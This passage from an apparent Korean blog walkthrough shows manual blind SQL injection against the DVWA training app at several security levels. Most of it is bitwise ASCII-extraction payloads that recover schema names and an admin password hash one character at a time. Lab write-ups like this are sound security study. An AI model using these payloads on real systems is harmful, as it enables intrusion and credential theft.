1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&2=2# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&4=4# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&8=8# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&16=16# (๊ฑฐ์ง“)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&32=32# (์ฐธ)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&64=64# (์ฐธ)
4, 32, 64 -> 100 -> d

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 100์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ d๊ฐ€ ๋œ๋‹ค.

์œ„์˜ ๊ฐ ๊ธ€์ž๋ฅผ ์กฐํ•ฉํ•˜๋ฉด ํ•ด๋‹น Column ์ด๋ฆ„์€ password์ธ ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

DATA ํ™•์ธํ•˜๊ธฐ

์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ์˜ ์œ„์น˜๋ฅผ ์ด๋ฏธ ์•Œ๊ณ ์„œ ์ง„ํ–‰ํ•œ๋‹ค.( users ํ…Œ์ด๋ธ”์˜ user ์ปฌ๋Ÿผ์˜ admin ๋ฐ์ดํ„ฐ์— ๋งค์น˜๋˜๋Š” password ์ปฌ๋Ÿผ์˜ ์ฒซ ๋ฒˆ์งธ ๊ฐ’์— ํ•ด๋‹นํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์กฐํšŒํ•  ๊ฒƒ์ด๋‹ค.) 

๋‹ค์Œ์˜ ๋ฐ์ดํ„ฐ๋Š” SQL Injection์—์„œ ์กฐํšŒํ•œ ๊ฒฐ๊ณผ์ด๋‹ค. ๋‹ค์Œ์˜ ๋ฐ์ดํ„ฐ๋ฅผ Blind SQL Injection์„ ์ด์šฉํ•˜์—ฌ ์กฐํšŒํ•˜๊ณ  ์ผ์น˜ํ•˜๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ ํ™•์ธํ•ด ๋ณผ ๊ฒƒ์ด๋‹ค.

select password from users limit 0,1

ํ•ด๋‹น Data์˜ ๊ฐ’์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค. (Low ๋ ˆ๋ฒจ์— ํ•œํ•˜์—ฌ, 32 ์ž์˜ ๊ฒฐ๊ณผ ์ „๋ถ€๋ฅผ ์ ์–ด ๋ณธ๋‹ค.)

1' and ascii(substr((select password from users limit 0,1),1,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),1,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),1,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),1,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),1,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),1,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),1,1))&64=64#
1, 4, 16, 32 -> 53 -> 5

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 53์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 5๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),2,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),2,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),2,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),2,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),2,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),2,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),2,1))&64=64#
2, 4, 32, 64 -> 102 -> f

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 102์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ f๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),3,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),3,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),3,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),3,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),3,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),3,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),3,1))&64=64#
4, 16, 32 -> 52 -> 4

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 52์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 4๊ฐ€ ๋œ๋‹ค.

4) 4, 32, 64 -> 100 -> d
5) 1, 2, 32, 64 -> 99 -> c
6) 1, 2, 32, 64 -> 99 -> c
7) 1, 2, 16, 32 -> 51 -> 3
8) 2, 32, 64 -> 98 -> b
9) 1, 4, 16, 32 -> 53 -> 5
10) 1, 32, 64 -> 97 -> a
11) 1, 32, 64 -> 97 -> a
12) 1, 2, 4, 16, 32 -> 55 -> 7
13) 2, 4, 16, 32 -> 54 -> 6
14) 1, 4, 16, 32 -> 53 -> 5
15) 4, 32, 64 -> 100 -> d
16) 2, 4, 16, 32 -> 54 -> 6
17) 1, 16, 32 -> 49 -> 1
18) 4, 32, 64 -> 100 -> d
19) 8, 16, 32 -> 56 -> 8
20) 1, 2, 16, 32 -> 51 -> 3
21) 2, 16, 32 -> 50 -> 2
22) 1, 2, 4, 16, 32 -> 55 -> 7
23) 4, 32, 64 -> 100 -> d
24) 1, 4, 32, 64 -> 101 -> e
25) 2, 32, 64 -> 98 -> b
26) 8, 16, 32 -> 56 -> 8
27) 8, 16, 32 -> 56 -> 8
28) 2, 16, 32 -> 50 -> 2
29) 1, 2, 32, 64 -> 99 -> c
30) 2, 4, 32, 64 -> 102 -> f

4 ~ 30 ๋ฒˆ์งธ์˜ ๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ๋Š” ์œ„์™€ ๊ฐ™๋‹ค.

1' and ascii(substr((select password from users limit 0,1),31,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),31,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),31,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),31,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),31,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),31,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),31,1))&64=64#
1, 8, 16, 32 -> 57 -> 9

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 57์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 9๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),32,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),32,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),32,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),32,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),32,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),32,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),32,1))&64=64#
1, 8, 16, 32 -> 57 -> 9

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 57์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 9๊ฐ€ ๋œ๋‹ค.

์œ„์˜ ๊ฐ ๊ธ€์ž๋ฅผ ์กฐํ•ฉํ•˜๋ฉด ํ•ด๋‹น Data์˜ ๊ฐ’์€ ๋‹ค์Œ๊ณผ ๊ฐ™๊ณ , ์ด๋ฅผ ์ด๋ฏธ ์•Œ๊ณ  ์žˆ๋Š” ๊ฐ’๊ณผ ๋น„๊ต๋ณด๋ฉด ์ผ์น˜ํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

5f4dcc3b5aa765d61d8327deb882cf99

์œ„์™€ ๊ฐ™์ด Blind SQL Injection์„ ํ†ตํ•ด ๊ฐ’์„ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ๋‹ค.

Security Level: Medium

Medium ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์œ„์™€ ๊ฐ™์ด mysqli_real_escape_string ์„ ์ด์šฉํ•˜๊ณ  ์žˆ์–ด์„œ ' ๊ฐ€ ๋จนํžˆ์ง€ ์•Š๋Š”๋‹ค. ๊ทธ๋ž˜์„œ LIMIT์„ ์ด์šฉํ•˜์—ฌ ๋ฐ์ดํ„ฐ๋ฅผ ์ฐพ์•„์ค„ ๊ฒƒ์ด๋‹ค. ํ•ด๋‹น ๋ ˆ๋ฒจ์—์„œ๋Š” DB ์ด๋ฆ„, TABLE ์ด๋ฆ„, COLUMN์ด๋ฆ„, DATA ์˜ ๊ฐ ์ฒซ๊ธ€์ž๋งŒ ํ™•์ธํ•˜๋Š” ์‹์œผ๋กœ ๋„˜๊ธธ ๊ฒƒ์ด๋‹ค.(๊ฐ€๋Šฅํ•œ์ง€์˜ ์—ฌ๋ถ€๋งŒ ํ™•์ธํ•œ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค.)

์šฐ์„  ์ฐธ/๊ฑฐ์ง“ ๊ฐ’์— ๋Œ€ํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ด๋ณธ๋‹ค.

 

True/False

Medium ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ง์ ‘ ์ž…๋ ฅ์„ ์œ„ํ•œ ์ฐฝ์ด ์—†๊ธฐ ๋•Œ๋ฌธ์— ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ๋ฅผ ํ†ตํ•ด์„œ ์ž…๋ ฅ์„ ์ง„ํ–‰ํ•œ๋‹ค.

์ฐธ(True)์ธ ๊ฐ’: 1 and 1=1

๊ฑฐ์ง“(False)์ธ ๊ฐ’: 1 and 1=2

 

๊ณต๊ฒฉ ์ฟผ๋ฆฌ(Query)

์šฐ์„  ๊ณต๊ฒฉ ์ฟผ๋ฆฌ๋ฅผ ์ž‘์„ฑํ•˜๊ณ  SQL ๊ตฌ๋ฌธ์ด ๋“ค์–ด๊ฐˆ ์ž๋ฆฌ์— ์›ํ•˜๋Š” SQL ๊ตฌ๋ฌธ์„ ์‚ฝ์ž…ํ•˜๋„๋ก ํ•œ๋‹ค.

Medium ๋ ˆ๋ฒจ์—์„œ๋Š” ์œ„์—์„œ ํ™•์ธํ–ˆ๋“ฏ์ด mysqli_real_escape_sting์„ ์ด์šฉํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ' ๊ฐ€ ์ธ์‹๋˜์ง€ ์•Š๋Š”๋‹ค. ๊ทธ๋Ÿฌ๋ฏ€๋กœ LIMIT์„ ์ถ”๊ฐ€์ ์œผ๋กœ ์ด์šฉํ•œ๋‹ค.

ํ•œ ๊ธ€์ž์˜ ๊ฐ’์„ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•œ 'ํ•œ ์„ธํŠธ'
1+and+ascii(substr((select+__SQL__),1,1))%261=1
1+and+ascii(substr((select+__SQL__),1,1))%262=2
1+and+ascii(substr((select+__SQL__),1,1))%264=4
1+and+ascii(substr((select+__SQL__),1,1))%268=8
1+and+ascii(substr((select+__SQL__),1,1))%2616=16
1+and+ascii(substr((select+__SQL__),1,1))%2632=32
1+and+ascii(substr((select+__SQL__),1,1))%2664=64

 

DB์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select database()

DB ์ด๋ฆ„์ด dvwa๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ d๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1+and+ascii(substr((select+database()),1,1))%261=1
1+and+ascii(substr((select+database()),1,1))%262=2
1+and+ascii(substr((select+database()),1,1))%264=4
1+and+ascii(substr((select+database()),1,1))%268=8
1+and+ascii(substr((select+database()),1,1))%2616=16
1+and+ascii(substr((select+database()),1,1))%2632=32
1+and+ascii(substr((select+database()),1,1))%2664=64
4, 32, 64 -> 100 -> d

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 100์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ d๊ฐ€ ๋œ๋‹ค.

 

TABLE ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select table_name from information_schema.tables limit 1,1

์›ํ•˜๋Š” ํ…Œ์ด๋ธ”์ด 2๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ณ , users ๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ u๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%261=1 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%262=2 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%264=4 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%268=8 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2616=16 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2632=32 1+and+ascii(substr((select+table_name+from+information_schema.tables+limit+1,1),1,1))%2664=64
1, 4, 16, 32, 64 -> 117 -> u

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 117์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ u๊ฐ€ ๋œ๋‹ค.

 

COLUMN ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select column_name from information_schema.columns limit 7,1

์›ํ•˜๋Š” ์ปฌ๋Ÿผ์ด 8๋ฒˆ์งธ์— ์กด์žฌํ•˜๊ณ , password๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ p๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค. (8๋ฒˆ์งธ ์ธ ์ด์œ ๋Š” ' ๊ฐ€ ๋จนํžˆ์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— guestbook ํ…Œ์ด๋ธ”์˜ ์ปฌ๋Ÿผ๋„ ์ถœ๋ ฅ๋˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ํ•ด๋‹น ์ปฌ๋Ÿผ์ด ์ด 3๊ฐœ์ด๊ณ , users ํ…Œ์ด๋ธ”์—์„œ password ์ปฌ๋Ÿผ์ด 5๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค.)

1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%261=1 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%262=2 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%264=4 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%268=8 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2616=16 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2632=32 1+and+ascii(substr((select+column_name+from+information_schema.columns+limit+7,1),1,1))%2664=64
16, 32, 64 -> 112 -> p

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 112์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ p๊ฐ€ ๋œ๋‹ค.

 

DATA ํ™•์ธํ•˜๊ธฐ

select password from users limit 0,1

ํ™•์ธํ•ด ๋ณผ ๋ฐ์ดํ„ฐ๊ฐ€ password ์ปฌ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ๋ฐ์ดํ„ฐ์ด๊ณ , ํ•ด๋‹น ๊ฐ’์ด 5f4dcc3b5aa765d61d8327deb882cf99์ž„์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ 5๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%261=1 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%262=2 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%264=4 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%268=8 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2616=16 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2632=32 1+and+ascii(substr((select+password+from+users+limit+0,1),1,1))%2664=64
1, 4, 16, 32 -> 53 -> 5

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 53์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 5๊ฐ€ ๋œ๋‹ค.

Security Level: High

High ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ์„ ์œ„ํ•œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ ์ด์™ธ์— ๋ฐฉ์‹์€ Low ๋ ˆ๋ฒจ๊ณผ ๊ฑฐ์˜ ๋™์ผํ•˜๋‹ค๊ณ  ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

ํ•ด๋‹น ๋ ˆ๋ฒจ์—์„œ๋„ DB ์ด๋ฆ„, TABLE ์ด๋ฆ„, COLUMN์ด๋ฆ„, DATA ์˜ ๊ฐ ์ฒซ๊ธ€์ž๋งŒ ํ™•์ธํ•˜๋Š” ์‹์œผ๋กœ ๋„˜๊ธธ ๊ฒƒ์ด๋‹ค. (๊ฐ€๋Šฅํ•œ์ง€์˜ ์—ฌ๋ถ€๋งŒ ํ™•์ธํ•œ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค.)

์šฐ์„  ์ฐธ/๊ฑฐ์ง“ ๊ฐ’์— ๋Œ€ํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ด๋ณธ๋‹ค.

 

True/False

์–ด๋–ค ์ž…๋ ฅ์„ ํ•˜๋“ , ์ž…๋ ฅ์šฉ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์—๋Š” Cookie ID set! ์ด๋ผ๋Š” ๋™์ผํ•œ ๋ฉ”์‹œ์ง€๋งŒ ์ถœ๋ ฅ๋œ๋‹ค. ํ•˜์ง€๋งŒ ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ํ™•์ธํ•ด๋ณด๋ฉด ํ•ด๋‹น ์ž…๋ ฅ์ด ๋“ค์–ด๊ฐ€๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

์ฐธ(True)์ธ ๊ฐ’: 1' and 1=1 #

๊ฑฐ์ง“(False)์ธ ๊ฐ’: 1' and 1=2 #

 

DB์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select database()

DB ์ด๋ฆ„์ด dvwa๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ d๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1' and ascii(substr((select database()),1,1))&1=1#
1' and ascii(substr((select database()),1,1))&2=2#
1' and ascii(substr((select database()),1,1))&4=4#
1' and ascii(substr((select database()),1,1))&8=8#
1' and ascii(substr((select database()),1,1))&16=16#
1' and ascii(substr((select database()),1,1))&32=32#
1' and ascii(substr((select database()),1,1))&64=64#
4, 32, 64 -> 100 -> d

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 100์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ d๊ฐ€ ๋œ๋‹ค.

 

TABLE ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1

์›ํ•˜๋Š” ํ…Œ์ด๋ธ”์ด 2๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ณ , users ๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ u๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&1=1#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&2=2#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&4=4#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&8=8#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&16=16#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&32=32#
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&64=64#
1, 4, 16, 32, 64 -> 117 -> u

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 117์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ u๊ฐ€ ๋œ๋‹ค.

 

COLUMN ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select column_name from information_schema.columns where table_name = 'users' limit 4,1

์›ํ•˜๋Š” ์ปฌ๋Ÿผ์ด users ํ…Œ์ด๋ธ”์˜ 5๋ฒˆ์งธ์— ์œ„์น˜ํ•˜๊ณ , password๋ผ๋Š” ์‚ฌ์‹ค์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ p๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค. 

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&1=1#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&2=2#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&4=4#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&8=8#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&16=16#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&32=32#
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&64=64#
16, 32, 64 -> 112 -> p

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 112์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ p๊ฐ€ ๋œ๋‹ค.

 

DATA ํ™•์ธํ•˜๊ธฐ

select password from users limit 0,1

ํ™•์ธํ•ด ๋ณผ ๋ฐ์ดํ„ฐ๊ฐ€ password ์ปฌ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ๋ฐ์ดํ„ฐ์ด๊ณ , ํ•ด๋‹น ๊ฐ’์ด 5f4dcc3b5aa765d61d8327deb882cf99์ž„์„ ์•Œ๊ณ  ์žˆ๋‹ค. ์ฒซ ๊ธ€์ž์— ๋Œ€ํ•˜์—ฌ 5๊ฐ€ ๋‚˜์˜ค๋Š”์ง€ ํ™•์ธํ•ด๋ณธ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),1,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),1,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),1,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),1,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),1,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),1,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),1,1))&64=64#
1, 4, 16, 32 -> 53 -> 5

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 53์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 5๊ฐ€ ๋œ๋‹ค.

Security Level: Impossible

Impossible ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•˜์—ฌ ์ˆซ์ž๋งŒ ์ž…๋ ฅ ๊ฐ€๋Šฅํ•˜๋„๋ก ํ–ˆ๊ธฐ ๋•Œ๋ฌธ์—, SQL Injection์ด ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค.

์งˆ๋ฌธ ํ™˜์˜, ์ˆ˜์ • ๋ฐ ๋ณด์™„์— ๋Œ€ํ•œ ์ง€์  ํ™˜์˜

์ €์ž‘์žํ‘œ์‹œ

'Practice/DVWA'์˜ ๋‹ค๋ฅธ๊ธ€

  • ํ˜„์žฌ๊ธ€[DVWA] SQL Injection (Blind ์ˆ˜๋™ ์ ๊ฒ€)

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”